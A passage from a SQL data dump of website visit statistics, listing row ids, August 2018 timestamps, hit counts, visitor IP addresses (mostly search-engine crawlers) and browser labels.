249.66.157',''),(294497,1535240601,1,1,0,0,'54.36.149.96','other'),(294498,1535240630,1,1,0,0,'54.36.148.121','other'),(294499,1535240735,1,1,0,0,'54.36.148.46','other'),(294500,1535240973,1,1,0,0,'54.36.148.48','other'),(294501,1535241013,1,1,0,0,'54.36.149.68','other'),(294502,1535241242,1,1,0,0,'54.36.148.142','other'),(294503,1535241246,1,1,0,0,'54.36.148.194','other'),(294504,1535241285,1,1,0,0,'54.36.149.67','other'),(294505,1535241320,3,3,0,0,'178.154.171.88','other'),(294506,1535241460,2,0,2,0,'66.249.66.155',''),(294507,1535241536,2,0,2,0,'66.249.66.157',''),(294508,1535241655,1,1,0,0,'66.249.66.155','chrome'),(294509,1535242137,1,1,0,0,'8.29.198.26','other'),(294510,1535242294,1,1,0,0,'54.36.149.107','other'),(294511,1535242401,1,1,0,0,'54.36.149.3','other'),(294512,1535242502,3,0,3,0,'66.249.66.157',''),(294513,1535242536,1,1,0,0,'85.199.141.237','other'),(294514,1535242801,3,0,3,0,'66.249.66.155',''),(294515,1535243058,1,1,0,0,'54.36.148.240','other'),(294516,1535243184,1,1,0,0,'54.36.148.58','other'),(294517,1535243471,3,3,0,0,'178.154.171.88','other'),(294518,1535243802,1,1,0,0,'54.36.148.101','other'),(294519,1535243804,1,1,0,0,'207.46.13.236','other'),(294520,1535243950,1,1,0,0,'54.36.148.123','other'),(294521,1535244422,2,0,2,0,'66.249.66.157',''),(294522,1535244722,2,0,2,0,'66.249.66.57',''),(294523,1535244935,3,3,0,0,'87.250.224.46','other'),(294524,1535245010,1,0,1,0,'66.249.66.155',''),(294525,1535245012,1,1,0,0,'54.36.148.226','other'),(294526,1535245040,1,1,0,0,'54.36.148.218','other'),(294527,1535245071,1,1,0,0,'54.36.148.84','other'),(294528,1535245237,1,1,0,0,'95.163.255.114','other'),(294529,1535245279,2,2,0,0,'54.36.149.15','other'),(294530,1535245458,1,1,0,0,'216.244.66.241','other'),(294531,1535245753,1,1,0,0,'37.9.113.182','other'),(294532,1535245757,1,1,0,0,'54.36.148.205','other'),(294533,1535245944,1,1,0,0,'54.36.149.63','other'),(294534,1535245970,1,1,0,0,'54.36.148.167','other'),(294535,1535246132,1,1,0,0,'77.247.181.163','other'),(294536,1535246213,1,0,1,0,'66.249.66.156',''),(294537,1535246368,1,1,0,0,'207.46.13.236','other'),(294538,1535246463,1,1,0,0,'54.36.148.95','other'),(294539,1535246671,1,1,0,0,'54.36.148.40','other'),(294540,1535246693,1,1,0,0,'87.250.224.46','other'),(294541,1535246847,1,1,0,0,'54.36.148.190','other'),(294542,1535246896,1,1,0,0,'54.36.149.30','other'),(294543,1535246940,1,1,0,0,'54.36.149.12','other'),(294544,1535247176,1,0,1,0,'66.249.66.156',''),(294545,1535247361,1,1,0,0,'54.36.149.96','other'),(294546,1535247425,1,1,0,0,'54.36.148.102','other'),(294547,1535247502,1,1,0,0,'54.36.148.229','other'),(294548,1535247823,1,1,0,0,'216.244.66.241','other'),(294549,1535247935,1,1,0,0,'54.36.149.21','other'),(294550,1535247957,1,1,0,0,'54.36.148.133','other'),(294551,1535247972,1,1,0,0,'178.154.171.88','other'),(294552,1535248058,3,0,3,0,'66.249.66.155',''),(294553,1535248069,1,1,0,0,'54.36.148.28','other'),(294554,1535248326,3,0,3,0,'66.249.66.156',''),(294555,1535248383,1,1,0,0,'54.36.148.152','other'),(294556,1535248405,1,1,0,0,'54.36.148.107','other'),(294557,1535248576,1,1,0,0,'54.36.149.99','other'),(294558,1535248643,1,1,0,0,'54.36.148.206','other'),(294559,1535248732,1,1,0,0,'95.163.255.97','other'),(294560,1535249076,1,1,0,0,'54.36.148.62','other'),(294561,1535249186,1,1,0,0,'54.36.148.54','other'),(294562,1535249314,1,1,0,0,'54.36.148.179','other'),(294563,1535249349,1,1,0,0,'54.36.148.165','other'),(294564,1535249372,1,1,0,0,'178.154.171.88','other'),(294565,1535249727,1,1,0,0,'51.15.80.14','other'),(294566,1535249841,1,1,0,0,'54.36.148.24','other'),(294567,1535250027,1,1,0,0,'54.36.149.14','other'),(294568,1535250070,1,1,0,0,'157.55.39.227','other'),(294569,1535250130,1,0,1,0,'66.249.66.59',''),(294570,1535250162,1,1,0,0,'54.36.148.184','other'),(294571,1535250189,1,1,0,0,'141.8.142.74','other'),(294572,1535250321,1,1,0,0,'54.36.149.97','other'),(294573,1535250339,1,1,0,0,'54.36.149.96','other'),(294574,1535250391,1,0,1,0,'66.249.66.57',''),(294575,1535250454,1,1,0,0,'54.36.148.158','other'),(294576,1535250561,1,1,0,0,'54.36.148.186','other'),(294577,1535250632,1,0,1,0,'66.249.66.157',''),(294578,1535250638,1,1,0,0,'54.36.148.30','other'),(294579,1535250641,1,0,1,0,'66.249.66.155',''),(294580,1535250757,1,1,0,0,'54.36.149.59','other'),(294581,1535250876,1,1,0,0,'54.36.149.101','other'),(294582,1535250893,1,1,0,0,'54.36.148.130','other'),(294583,1535250898,1,1,0,0,'54.36.148.162','other'),(294584,1535251067,1,1,0,0,'54.36.149.27','other'),(294585,1535251097,1,1,0,0,'54.36.148.161','other'),(294586,1535251160,1,1,0,0,'54.36.149.1','other'),(294587,1535251195,1,1,0,0,'54.36.149.61','other'),(294588,1535251222,1,1,0,0,'54.36.148.143','other'),(294589,1535251238,1,1,0,0,'54.36.148.33','other'),(294590,1535251319,1,1,0,0,'54.36.148.106','other'),(294591,1535251457,1,1,0,0,'66.249.66.155','chrome'),(294592,1535251507,1,1,0,0,'54.36.148.107','other'),(294593,1535251684,1,1,0,0,'54.36.149.35','other'),(294594,1535251771,1,0,1,0,'66.249.66.156',''),(294595,1535251876,1,1,0,0,'54.36.148.139','other'),(294596,1535252020,1,1,0,0,'178.154.171.88','other'),(294597,1535252130,1,0,1,0,'66.249.66.61',''),(294598,1535252147,1,1,0,0,'54.36.148.109','other'),(294599,1535252194,1,0,1,0,'66.249.66.157',''),(294600,1535252228,1,1,0,0,'40.77.167.55','other'),(294601,1535252292,1,1,0,0,'141.8.142.74','other'),(294602,1535252397,1,1,0,0,'54.36.148.120','other'),(294603,1535252483,1,1,0,0,'54.36.148.254','other'),(294604,1535252955,3,3,0,0,'178.154.171.88','other'),(294605,1535252976,1,1,0,0,'8.29.198.26','other'),(294606,1535252986,3,3,0,0,'87.250.224.46','other'),(294607,1535253077,1,1,0,0,'54.36.148.139','other'),(294608,1535253145,1,1,0,0,'54.36.148.173','other'),(294609,1535253225,1,1,0,0,'54.36.148.124','other'),(294610,1535253321,1,1,0,0,'137.74.169.241','other'),(294611,1535253392,1,1,0,0,'54.36.149.63','other'),(294612,1535253505,1,1,0,0,'54.36.149.7','other'),(294613,1535253526,1,1,0,0,'54.36.148.235','other'),(294614,1535253636,1,1,0,0,'54.36.148.14','other'),(294615,1535253747,1,1,0,0,'195.201.222.141','other'),(294616,1535253879,1,1,0,0,'54.36.148.108','other'),(294617,1535253909,4,0,4,0,'66.249.66.155',''),(294618,1535254268,1,1,0,0,'95.163.255.92','other'),(294619,1535254293,1,1,0,0,'54.36.149.56','other'),(294620,1535254501,3,3,0,0,'141.8.142.74','other'),(294621,1535254665,1,1,0,0,'66.249.66.59','chrome'),(294622,1535255093,1,1,0,0,'54.36.148.41','other'),(294623,1535255202,2,0,2,0,'66.249.66.155',''),(294624,1535255322,1,1,0,0,'54.36.149.36','other'),(294625,1535255371,1,1,0,0,'54.36.148.152','other'),(294626,1535255462,1,0,1,0,'66.249.66.157',''),(294627,1535255637,1,1,0,0,'54.36.148.86','other'),(294628,1535255653,1,0,1,0,'66.249.66.156',''),(294629,1535255682,1,1,0,0,'54.36.148.133','other'),(294630,1535255724,1,1,0,0,'54.36.148.130','other'),(294631,1535255964,1,1,0,0,'54.36.149.57','other'),(294632,1535256311,1,1,0,0,'54.36.149.101','other'),(294633,1535256549,3,3,0,0,'141.8.142.74','other'),(294634,1535256590,1,1,0,0,'91.196.178.133','firefox'),(294635,1535256716,1,1,0,0,'54.36.149.96','other'),(294636,1535256922,1,1,0,0,'46.182.106.190','other'),(294637,1535257455,1,1,0,0,'54.36.148.221','other'),(294638,1535257731,1,0,1,0,'66.249.66.57',''),(294639,1535257748,2,1,1,0,'66.249.66.156',''),(294640,1535257974,1,0,1,0,'66.249.66.157',''),(294641,1535258067,1,1,0,0,'54.36.148.146','other'),(294642,1535258072,1,0,1,0,'66.249.66.59',''),(294643,1535258095,1,1,0,0,'54.36.149.79','other'),(294644,1535258198,1,1,0,0,'54.36.149.105','other'),(294645,1535258221,1,1,0,0,'54.36.149.2','other'),(294646,1535258232,1,1,0,0,'54.36.148.47','other'),(294647,1535258400,1,1,0,0,'54.36.149.31','other'),(294648,1535258486,1,1,0,0,'54.36.148.104','other'),(294649,1535258852,1,0,1,0,'66.249.66.156',''),(294650,1535258999,1,1,0,0,'54.36.149.20','other'),(294651,1535259242,1,1,0,0,'178.154.171.88','other'),(294652,1535259336,2,0,2,0,'66.249.66.155',''),(294653,1535259348,1,1,0,0,'54.36.148.198','other'),(294654,1535259696,1,1,0,0,'54.36.148.225','other'),(294655,1535260111,1,1,0,0,'40.77.167.55','other'),(294656,1535260239,1,1,0,0,'178.154.171.88','other'),(294657,1535260369,1,1,0,0,'54.36.148.172','other'),(294658,1535260371,1,1,0,0,'54.36.148.235','other'),(294659,1535260424,1,1,0,0,'54.36.149.0','other'),(294660,1535260483,2,0,2,0,'66.249.66.155',''),(294661,1535260513,1,1,0,0,'51.254.209.128','other'),(294662,1535260815,1,1,0,0,'54.36.148.215','other'),(294663,1535260971,2,0,2,0,'66.249.66.157',''),(294664,1535261015,2,0,2,0,'66.249.66.156',''),(294665,1535261181,2,0,2,0,'66.249.66.59',''),(294666,1535261360,1,1,0,0,'54.36.149.82','other'),(294667,1535261585,1,1,0,0,'66.249.66.57','chrome'),(294668,1535261597,1,1,0,0,'54.36.149.50','other'),(294669,1535261803,1,1,0,0,'54.36.148.220','other'),(294670,1535261950,1,1,0,0,'54.36.148.53','other'),(294671,1535262326,1,1,0,0,'54.36.148.25','other'),(294672,1535262496,1,1,0,0,'54.36.148.251','other'),(294673,1535262680,1,0,1,0,'66.249.66.157',''),(294674,1535262730,1,1,0,0,'207.46.13.236','other'),(294675,1535262926,1,1,0,0,'54.36.148.200','other'),(294676,1535263087,1,1,0,0,'54.36.148.124','other'),(294677,1535263503,1,1,0,0,'54.36.148.153','other'),(294678,1535263745,1,1,0,0,'54.36.148.90','other'),(294679,1535263748,1,1,0,0,'54.36.148.61','other'),(294680,1535263795,1,1,0,0,'141.8.142.74','other'),(294681,1535263813,1,1,0,0,'8.29.198.27','other'),(294682,1535264143,1,0,1,0,'66.249.66.155',''),(294683,1535264207,1,1,0,0,'54.36.148.156','other'),(294684,1535264341,1,1,0,0,'178.154.171.88','other'),(294685,1535264391,1,1,0,0,'54.36.148.167','other'),(294686,1535264596,1,1,0,0,'54.36.149.9','other'),(294687,1535264684,1,0,1,0,'66.249.66.157',''),(294688,1535264836,1,1,0,0,'95.163.255.97','other'),(294689,1535264874,1,1,0,0,'54.36.148.149','other'),(294690,1535264910,1,1,0,0,'54.36.148.191','other'),(294691,1535264918,1,1,0,0,'54.36.148.45','other'),(294692,1535265093,1,1,0,0,'54.36.148.16','other'),(294693,1535265143,1,1,0,0,'54.36.148.222','other'),(294694,1535265653,1,1,0,0,'54.36.148.73','other'),(294695,1535265876,1,1,0,0,'54.36.148.207','other'),(294696,1535265972,1,1,0,0,'54.36.148.61','other'),(294697,1535266018,1,1,0,0,'54.36.148.203','other'),(294698,1535266244,1,0,1,0,'66.249.66.61',''),(294699,1535266263,1,1,0,0,'54.36.148.164','other'),(294700,1535266417,1,1,0,0,'199.58.86.209','other'),(294701,1535266422,1,1,0,0,'54.36.148.17','other'),(294702,1535266455,1,1,0,0,'54.36.149.42','other'),(294703,1535266551,1,1,0,0,'207.46.13.236','other'),(294704,1535266881,1,1,0,0,'54.36.148.243','other'),(294705,1535266913,1,0,1,0,'66.249.66.155',''),(294706,1535266917,1,1,0,0,'178.154.171.88','other'),(294707,1535267076,1,1,0,0,'54.36.148.199','other'),(294708,1535267339,1,1,0,0,'54.36.148.174','other'),(294709,1535267390,1,1,0,0,'54.36.148.95','other'),(294710,1535267534,1,1,0,0,'54.36.149.2','other'),(294711,1535267710,1,1,0,0,'54.36.148.242','other'),(294712,1535267719,1,1,0,0,'87.250.224.46','other'),(294713,1535267733,1,1,0,0,'178.17.170.194','other'),(294714,1535267786,1,0,1,0,'66.249.66.57',''),(294715,1535267855,2,0,2,0,'66.249.66.155',''),(294716,1535267924,1,1,0,0,'54.36.148.97','other'),(294717,1535268013,1,1,0,0,'54.36.149.62','other'),(294718,1535268215,1,1,0,0,'54.36.148.94','other'),(294719,1535268255,1,1,0,0,'54.36.148.236','other'),(294720,1535268309,1,1,0,0,'54.36.148.106','other'),(294721,1535268401,1,1,0,0,'54.36.148.56','other'),(294722,1535268871,2,0,2,0,'66.249.66.157',''),(294723,1535268896,1,1,0,0,'141.8.142.74','other'),(294724,1535268970,1,1,0,0,'54.165.59.7','other'),(294725,1535269212,1,1,0,0,'54.36.148.163','other'),(294726,1535269252,1,1,0,0,'51.255.65.46','other'),(294727,1535269261,1,1,0,0,'54.36.148.182','other'),(294728,1535269280,1,1,0,0,'54.36.148.125','other'),(294729,1535269303,1,1,0,0,'54.36.148.115','other'),(294730,1535269502,1,1,0,0,'54.36.148.69','other'),(294731,1535269614,1,1,0,0,'167.114.219.41','other'),(294732,1535269763,1,1,0,0,'178.154.171.88','other'),(294733,1535270074,1,1,0,0,'54.36.149.33','other'),(294734,1535270115,2,0,2,0,'66.249.66.156',''),(294735,1535270255,1,1,0,0,'54.36.148.198','other'),(294736,1535270286,1,0,1,0,'66.249.66.157',''),(294737,1535270296,1,1,0,0,'54.36.148.114','other'),(294738,1535270456,1,1,0,0,'54.36.148.56','other'),(294739,1535270567,1,0,1,0,'66.249.66.61',''),(294740,1535270750,2,0,2,0,'66.249.66.155',''),(294741,1535270814,1,1,0,0,'54.36.149.1','other'),(294742,1535271323,1,1,0,0,'109.70.100.18','other'),(294743,1535271352,1,1,0,0,'54.36.148.165','other'),(294744,1535271782,1,1,0,0,'54.36.149.75','other'),(294745,1535272016,1,1,0,0,'54.36.148.83','other'),(294746,1535272214,1,0,1,0,'66.249.66.155',''),(294747,1535272258,1,1,0,0,'178.154.171.88','other'),(294748,1535272378,1,1,0,0,'157.55.39.250','other'),(294749,1535272906,1,0,1,0,'66.249.66.156',''),(294750,1535273004,1,1,0,0,'54.36.148.22','other'),(294751,1535273224,1,1,0,0,'54.36.148.78','other'),(294752,1535273293,1,1,0,0,'87.250.224.46','other'),(294753,1535273330,1,0,1,0,'66.249.66.59',''),(294754,1535273902,1,1,0,0,'66.249.66.57','chrome'),(294755,1535273913,1,1,0,0,'54.36.148.48','other'),(294756,1535273956,1,0,1,0,'66.249.66.156',''),(294757,1535273959,1,1,0,0,'207.46.13.236','other'),(294758,1535273989,1,1,0,0,'54.36.148.50','other'),(294759,1535274536,2,2,0,0,'130.180.219.159','chrome'),(294760,1535274539,1,1,0,0,'54.36.148.91','other'),(294761,1535274649,1,1,0,0,'8.29.198.27','other'),(294762,1535274954,3,3,0,0,'141.8.142.74','other'),(294763,1535274980,1,0,1,0,'66.249.66.59',''),(294764,1535275201,1,1,0,0,'54.36.148.205','other'),(294765,1535275551,1,1,0,0,'54.36.148.79','other'),(294766,1535275586,1,1,0,0,'54.36.148.41','other'),(294767,1535275674,1,1,0,0,'207.46.13.236','other'),(294768,1535275771,1,1,0,0,'54.36.148.102','other'),(294769,1535275783,1,1,0,0,'54.36.148.178','other'),(294770,1535275807,1,1,0,0,'54.36.148.35','other'),(294771,1535275939,1,1,0,0,'54.36.149.80','other'),(294772,1535276082,1,1,0,0,'54.36.149.40','other'),(294773,1535276111,2,2,0,0,'69.30.234.2','other'),(294774,1535276132,1,1,0,0,'54.36.148.95','other'),(294775,1535276528,2,2,0,0,'141.8.142.74','other'),(294776,1535276530,1,1,0,0,'141.8.132.19','other'),(294777,1535276709,1,0,1,0,'66.249.66.156',''),(294778,1535276723,1,1,0,0,'91.196.178.184','chrome'),(294779,1535277163,1,1,0,0,'54.36.148.98','other'),(294780,1535277381,1,1,0,0,'54.36.148.13','other'),(294781,1535277512,1,1,0,0,'54.36.149.23','other'),(294782,1535277878,1,1,0,0,'178.154.171.88','other'),(294783,1535277888,1,0,1,0,'66.249.66.156',''),(294784,1535277916,2,2,0,0,'54.165.59.7','other'),(294785,1535278000,1,1,0,0,'54.36.148.104','other'),(294786,1535278003,1,1,0,0,'207.46.13.236','other'),(294787,1535278163,1,1,0,0,'37.9.113.157','other'),(294788,1535278337,1,1,0,0,'54.36.148.210','other'),(294789,1535278533,1,1,0,0,'93.115.95.205','other'),(294790,1535278610,1,1,0,0,'54.36.148.202','other'),(294791,1535278863,1,1,0,0,'54.36.148.119','other'),(294792,1535278943,2,0,2,0,'66.249.66.157',''),(294793,1535278967,1,0,1,0,'66.249.66.156',''),(294794,1535279080,2,1,1,0,'66.249.66.59',''),(294795,1535279107,1,1,0,0,'54.36.149.73','other'),(294796,1535279285,1,1,0,0,'54.36.148.98','other'),(294797,1535279295,1,1,0,0,'141.8.142.74','other'),(294798,1535279477,1,1,0,0,'54.36.148.147','other'),(294799,1535279683,1,1,0,0,'54.36.148.57','other'),(294800,1535279687,1,0,1,0,'66.249.66.57',''),(294801,1535279988,1,1,0,0,'54.36.148.190','other'),(294802,1535280326,1,1,0,0,'141.8.142.74','other'),(294803,1535280415,1,1,0,0,'54.36.149.32','other'),(294804,1535280490,1,1,0,0,'54.36.148.192','other'),(294805,1535280504,1,1,0,0,'54.36.148.238','other'),(294806,1535280912,1,0,1,0,'66.249.66.156',''),(294807,1535281021,1,1,0,0,'54.36.149.26','other'),(294808,1535281108,1,1,0,0,'54.36.148.14','other'),(294809,1535281351,1,1,0,0,'54.36.149.58','other'),(294810,1535281355,1,1,0,0,'178.154.171.88','other'),(294811,1535281390,1,1,0,0,'54.36.148.152','other'),(294812,1535281623,1,1,0,0,'54.36.148.137','other'),(294813,1535281694,1,1,0,0,'54.36.149.30','other'),(294814,1535282070,1,1,0,0,'141.8.142.74','other'),(294815,1535282140,1,1,0,0,'185.220.101.25','other'),(294816,1535282348,1,1,0,0,'54.36.148.86','other'),(294817,1535282354,1,1,0,0,'54.36.148.187','other'),(294818,1535282476,1,1,0,0,'54.36.148.69','other'),(294819,1535282508,1,1,0,0,'54.36.148.122','other'),(294820,1535282548,1,1,0,0,'216.244.66.241','other'),(294821,1535282843,1,0,1,0,'66.249.66.156',''),(294822,1535283868,1,1,0,0,'54.36.148.59','other'),(294823,1535283893,1,1,0,0,'54.36.148.254','other'),(294824,1535283943,2,2,0,0,'141.8.142.74','other'),(294825,1535284022,1,1,0,0,'54.36.148.32','other'),(294826,1535284245,1,1,0,0,'54.36.149.107','other'),(294827,1535284385,1,1,0,0,'54.36.148.157','other'),(294828,1535284486,1,1,0,0,'54.36.148.127','other'),(294829,1535284671,2,2,0,0,'178.154.171.88','other'),(294830,1535284683,1,0,1,0,'66.249.66.155',''),(294831,1535284803,1,1,0,0,'66.249.66.57','chrome'),(294832,1535285221,1,1,0,0,'54.36.149.95','other'),(294833,1535285317,1,1,0,0,'141.8.142.74','other'),(294834,1535285416,1,1,0,0,'54.36.148.50','other'),(294835,1535285485,1,1,0,0,'8.29.198.25','other'),(294836,1535285716,1,1,0,0,'185.248.160.21','other'),(294837,1535285785,1,1,0,0,'54.36.148.12','other'),(294838,1535286189,1,1,0,0,'54.36.148.220','other'),(294839,1535286245,1,1,0,0,'91.196.178.183','chrome'),(294840,1535286376,1,1,0,0,'54.36.148.115','other'),(294841,1535286526,1,1,0,0,'54.36.149.71','other'),(294842,1535286555,1,1,0,0,'176.193.138.81','chrome'),(294843,1535286561,2,2,0,0,'141.8.142.74','other'),(294844,1535286727,1,1,0,0,'54.36.148.138','other'),(294845,1535287037,1,1,0,0,'54.36.149.99','other'),(294846,1535287299,1,1,0,0,'54.36.148.137','other'),(294847,1535287301,1,1,0,0,'54.36.148.176','other'),(294848,1535287479,2,2,0,0,'54.36.148.145','other'),(294849,1535287548,1,1,0,0,'54.36.148.146','other'),(294850,1535287751,1,1,0,0,'54.36.148.220','other'),(294851,1535287771,1,1,0,0,'54.36.148.121','other'),(294852,1535288137,1,1,0,0,'54.36.148.188','other'),(294853,1535288148,1,1,0,0,'54.36.148.227','other'),(294854,1535288450,1,1,0,0,'66.249.66.59','chrome'),(294855,1535288493,1,1,0,0,'54.36.148.105','other'),(294856,1535288566,1,1,0,0,'54.36.148.148','other'),(294857,1535288651,1,1,0,0,'54.36.148.164','other'),(294858,1535288925,1,1,0,0,'54.36.149.42','other'),(294859,1535289017,1,1,0,0,'54.36.148.78','other'),(294860,1535289072,1,1,0,0,'216.244.66.241','other'),(294861,1535289385,1,1,0,0,'54.36.148.74','other'),(294862,1535289650,1,0,1,0,'66.249.66.155',''),(294863,1535289894,1,1,0,0,'54.36.149.35','other'),(294864,1535289932,1,1,0,0,'207.46.13.236','other'),(294865,1535289995,1,1,0,0,'54.36.149.90','other'),(294866,1535290334,1,1,0,0,'54.36.149.12','other'),(294867,1535290389,1,1,0,0,'54.36.148.65','other'),(294868,1535290623,1,1,0,0,'54.36.149.17','other'),(294869,1535290720,1,1,0,0,'54.208.102.37','other'),(294870,1535290722,1,1,0,0,'107.21.1.8','other'),(294871,1535290854,4,1,3,0,'66.249.66.155',''),(294872,1535291086,1,1,0,0,'54.36.148.67','other'),(294873,1535291654,1,1,0,0,'54.36.148.113','other'),(294874,1535291666,1,1,0,0,'54.36.149.90','other'),(294875,1535291706,1,1,0,0,'52.53.201.78','chrome'),(294876,1535291708,1,0,1,0,'66.249.66.157',''),(294877,1535291747,1,1,0,0,'54.36.148.21','other'),(294878,1535291928,1,1,0,0,'54.36.149.21','other'),(294879,1535292012,1,1,0,0,'37.55.227.194','chrome'),(294880,1535292408,1,1,0,0,'54.36.148.175','other'),(294881,1535292770,1,1,0,0,'54.36.149.31','other'),(294882,1535292919,1,1,0,0,'54.36.149.101','other'),(294883,1535292931,1,1,0,0,'185.200.123.15','other'),(294884,1535292939,1,1,0,0,'95.163.255.97','other'),(294885,1535293367,2,2,0,0,'216.244.66.241','other'),(294886,1535293581,1,1,0,0,'54.36.148.237','other'),(294887,1535293596,1,1,0,0,'66.249.66.61','chrome'),(294888,1535294571,1,1,0,0,'54.36.149.60','other'),(294889,1535294591,1,1,0,0,'54.36.148.174','other'),(294890,1535294679,1,1,0,0,'54.36.149.74','other'),(294891,1535294711,1,1,0,0,'54.36.148.233','other'),(294892,1535294982,1,1,0,0,'54.36.148.122','other'),(294893,1535295021,1,1,0,0,'54.36.148.178','other'),(294894,1535295382,1,1,0,0,'207.46.13.236','other'),(294895,1535295698,2,2,0,0,'178.154.171.88','other'),(294896,1535295702,2,2,0,0,'141.8.142.74','other'),(294897,1535295789,1,1,0,0,'54.36.148.36','other'),(294898,1535295859,1,1,0,0,'54.36.148.246','other'),(294899,1535295907,1,1,0,0,'54.36.149.102','other'),(294900,1535295915,1,1,0,0,'54.36.149.29','other'),(294901,1535296009,1,1,0,0,'54.36.148.38','other'),(294902,1535296161,1,1,0,0,'54.36.148.230','other'),(294903,1535296274,1,1,0,0,'54.36.148.11','other'),(294904,1535296328,1,1,0,0,'8.29.198.25','other'),(294905,1535296399,1,1,0,0,'54.36.148.182','other'),(294906,1535296528,1,1,0,0,'54.36.148.74','other'),(294907,1535296553,1,1,0,0,'192.42.116.19','other'),(294908,1535296618,1,1,0,0,'207.46.13.151','other'),(294909,1535296814,1,1,0,0,'54.36.148.49','other'),(294910,1535296964,1,0,1,0,'66.249.66.157',''),(294911,1535297045,1,1,0,0,'54.36.148.254','other'),(294912,1535297093,1,0,1,0,'66.249.66.155',''),(294913,1535297571,1,1,0,0,'66.249.66.59','chrome'),(294914,1535297611,1,1,0,0,'54.36.148.251','other'),(294915,1535298062,1,1,0,0,'54.36.148.63','other'),(294916,1535298111,2,2,0,0,'54.36.149.14','other'),(294917,1535298182,1,1,0,0,'54.36.148.76','other'),(294918,1535298216,3,3,0,0,'216.244.66.241','other'),(294919,1535298264,2,2,0,0,'141.8.142.74','other'),(294920,1535298596,1,1,0,0,'54.36.148.57','other'),(294921,1535298646,1,1,0,0,'176.105.205.85','chrome'),(294922,1535298930,1,0,1,0,'66.249.66.57',''),(294923,1535299296,1,1,0,0,'54.36.149.97','other'),(294924,1535299329,1,0,1,0,'66.249.66.155',''),(294925,1535299459,1,1,0,0,'178.154.171.88','other'),(294926,1535299505,1,1,0,0,'54.36.149.94','other'),(294927,1535299613,1,1,0,0,'54.36.148.198','other'),(294928,1535299783,3,3,0,0,'141.8.142.74','other'),(294929,1535300003,1,1,0,0,'46.211.157.241','firefox'),(294930,1535300070,1,1,0,0,'54.36.149.34','other'),(294931,1535300097,1,1,0,0,'54.36.149.4','other'),(294932,1535300148,1,1,0,0,'185.220.101.8','other'),(294933,1535300150,1,1,0,0,'54.36.148.88','other'),(294934,1535300284,1,1,0,0,'54.36.149.67','other'),(294935,1535300356,1,1,0,0,'54.36.148.216','other'),(294936,1535300378,1,1,0,0,'54.36.148.202','other'),(294937,1535300559,1,1,0,0,'91.196.178.98','other'),(294938,1535300684,1,1,0,0,'141.8.142.74','other'),(294939,1535300758,2,2,0,0,'216.244.66.241','other'),(294940,1535300781,1,1,0,0,'54.36.149.8','other'),(294941,1535301033,1,1,0,0,'46.211.157.241','firefox'),(294942,1535301085,1,1,0,0,'54.36.148.93','other'),(294943,1535301141,1,1,0,0,'66.249.66.57','chrome'),(294944,1535301246,1,1,0,0,'54.36.149.16','other'),(294945,1535301334,1,1,0,0,'54.36.148.181','other'),(294946,1535301620,1,1,0,0,'54.36.148.33','other'),(294947,1535301734,1,1,0,0,'178.154.171.88','other'),(294948,1535301902,1,1,0,0,'54.36.149.71','other'),(294949,1535302170,1,1,0,0,'54.36.148.220','other'),(294950,1535302237,1,1,0,0,'141.8.142.74','other'),(294951,1535302263,1,1,0,0,'54.36.148.162','other'),(294952,1535302315,1,1,0,0,'54.36.148.51','other'),(294953,1535302420,1,1,0,0,'54.36.149.5','other'),(294954,1535302421,1,1,0,0,'54.36.148.163','other'),(294955,1535302468,1,0,1,0,'66.249.66.157',''),(294956,1535302532,1,1,0,0,'54.36.148.43','other'),(294957,1535302543,1,1,0,0,'54.36.148.39','other'),(294958,1535302548,1,1,0,0,'54.36.148.98','other'),(294959,1535302590,1,1,0,0,'54.36.148.37','other'),(294960,1535302970,1,1,0,0,'54.36.149.47','other'),(294961,1535303088,1,1,0,0,'54.36.149.66','other'),(294962,1535303134,1,1,0,0,'54.36.148.128','other'),(294963,1535303361,1,1,0,0,'54.36.148.200','other'),(294964,1535303597,2,2,0,0,'216.244.66.241','other'),(294965,1535303686,1,1,0,0,'54.36.148.226','other'),(294966,1535303952,1,1,0,0,'54.36.149.24','other'),(294967,1535303982,20,20,0,0,'90.86.25.4','other'),(294968,1535304093,1,1,0,0,'54.36.148.165','other'),(294969,1535304211,1,0,1,0,'66.249.66.155',''),(294970,1535304393,1,0,1,0,'66.249.66.59',''),(294971,1535304437,1,1,0,0,'54.36.148.111','other'),(294972,1535304748,1,1,0,0,'54.36.149.36','other'),(294973,1535304795,2,0,2,0,'66.249.66.157',''),(294974,1535304801,2,2,0,0,'141.8.142.74','other'),(294975,1535304898,1,1,0,0,'54.36.149.39','other'),(294976,1535305331,1,1,0,0,'52.41.211.72','chrome'),(294977,1535305448,1,1,0,0,'54.36.148.154','other'),(294978,1535305492,1,1,0,0,'54.36.148.77','other'),(294979,1535305596,1,1,0,0,'54.36.149.1','other'),(294980,1535305932,1,1,0,0,'54.36.148.86','other'),(294981,1535306069,1,1,0,0,'54.36.148.54','other'),(294982,1535306103,4,4,0,0,'216.244.66.241','other'),(294983,1535306114,1,1,0,0,'157.55.39.250','other'),(294984,1535306120,1,1,0,0,'178.154.171.88','other'),(294985,1535306124,3,3,0,0,'141.8.142.74','other'),(294986,1535306452,1,1,0,0,'54.36.148.230','other'),(294987,1535306709,1,0,1,0,'66.249.66.156',''),(294988,1535306745,1,1,0,0,'54.36.148.181','other'),(294989,1535306756,1,1,0,0,'54.36.148.12','other'),(294990,1535306762,1,1,0,0,'66.249.66.61','chrome'),(294991,1535306907,1,1,0,0,'54.36.148.170','other'),(294992,1535307074,1,1,0,0,'92.113.189.235','chrome'),(294993,1535307115,1,1,0,0,'54.36.149.18','other'),(294994,1535307119,1,1,0,0,'54.36.148.65','other'),(294995,1535307178,1,1,0,0,'8.29.198.26','other'),(294996,1535307266,1,1,0,0,'54.36.149.7','other'),(294997,1535307307,1,1,0,0,'54.36.148.125','other'),(294998,1535307309,1,1,0,0,'54.36.148.113','other'),(294999,1535307368,1,1,0,0,'54.36.148.108','other'),(295000,1535307482,1,1,0,0,'54.36.148.20','other'),(295001,1535307637,1,1,0,0,'54.36.148.195','other'),(295002,1535307641,1,0,1,0,'66.249.66.155',''),(295003,1535307710,1,1,0,0,'95.84.161.202','chrome'),(295004,1535307967,1,1,0,0,'54.36.148.243','other'),(295005,1535308156,1,1,0,0,'54.36.148.235','other'),(295006,1535308556,3,3,0,0,'216.244.66.241','other'),(295007,1535308763,1,1,0,0,'178.154.171.88','other'),(295008,1535308777,2,2,0,0,'141.8.142.74','other'),(295009,1535308855,1,1,0,0,'54.36.148.114','other'),(295010,1535308964,1,1,0,0,'54.36.148.69','other'),(295011,1535309068,1,1,0,0,'54.36.148.83','other'),(295012,1535309098,1,1,0,0,'207.46.13.151','other'),(295013,1535309119,1,1,0,0,'157.55.39.250','other'),(295014,1535309509,1,1,0,0,'54.36.